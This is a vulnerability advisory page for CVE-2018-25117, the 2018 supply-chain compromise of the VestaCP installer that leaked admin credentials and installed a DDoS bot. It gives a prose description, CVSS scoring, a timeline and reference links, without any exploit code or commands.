Supply-Chain Compromise in VestaCP Software by Outroll
CVE-2018-25117

9.3CRITICAL

Key Information:

Vendor

Vesta

Status
Control Panel (cp)
Vendor
CVE Published:
15 October 2025

Badges

👾 Exploit Exists🟡 Public PoC

What is CVE-2018-25117?

A vulnerability in the VestaCP software allowed for the injection of embedded malicious code between specific commits in 2018. This supply-chain compromise led to new installations being configured with a DDoS bot, Linux/ChachaDDoS, which utilized Lua for its secondary components. During the installation process, administrative credentials were leaked to an external URL, and the installer executed a malicious payload with local system privileges. As a result, compromised servers participated in large-scale DDoS attacks, prompting Vesta to acknowledge exploitation in the wild by October 2018.

Affected Version(s)

Control Panel (CP) commit a3f0fa1 (2018-05-31)

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

CVE-2018-25117 - Proof of Concept

References

https://www.welivesecurity.com/2018/10/18/new-linux-chach...
technical-description
https://github.com/outroll/vesta/commit/ee03eff016e03cb76...
patch
https://github.com/outroll/vesta/commit/a3f0fa1501d424477...
exploit

CVSS V4

Score:
9.3
Severity:
CRITICAL
Confidentiality:
High
Integrity:
High
Availability:
None
Attack Vector:
Network
Attack Complexity:
Low
Attack Required:
None
Privileges Required:
Undefined
User Interaction:
Unknown

Timeline

  • 🟡

    Public PoC available

  • 👾

    Exploit known to exist

  • Vulnerability published

  • Vulnerability Reserved

Credit

Kaspersky Labs
JSON
.
CVE-2018-25117 : Supply-Chain Compromise in VestaCP Software by Outroll